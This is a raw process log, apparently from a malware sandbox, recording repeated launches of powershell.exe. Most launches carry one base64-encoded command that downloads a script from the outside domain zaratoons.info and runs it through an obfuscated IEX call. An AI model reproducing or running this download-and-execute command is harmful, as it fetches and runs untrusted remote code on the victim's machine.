Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
62
3908
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
63
3916
powershell.exe
1204
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
64
3924
powershell.exe
2052
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
65
3932
powershell.exe
2436
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
66
3940
powershell.exe
1972
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
67
3948
powershell.exe
1416
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
68
3992
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
69
2240
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
70
3036
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
71
2500
powershell.exe
2620
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
72
3248
powershell.exe
2548
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
73
2400
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
74
3368
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
75
3464
powershell.exe
2556
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
76
3540
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
77
3012
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
78
3000
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
79
3720
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
80
3828
powershell.exe
2140
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
81
2036
powershell.exe
2192
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
82
1400
powershell.exe
1444
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
83
2220
powershell.exe
2428
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Process
84
1312
powershell.exe
1600
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Process
85
1356
powershell.exe
2880
powershell.exe
